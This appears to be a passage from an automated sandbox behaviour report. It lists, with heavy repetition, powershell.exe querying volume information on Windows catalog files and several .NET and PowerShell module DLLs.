                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
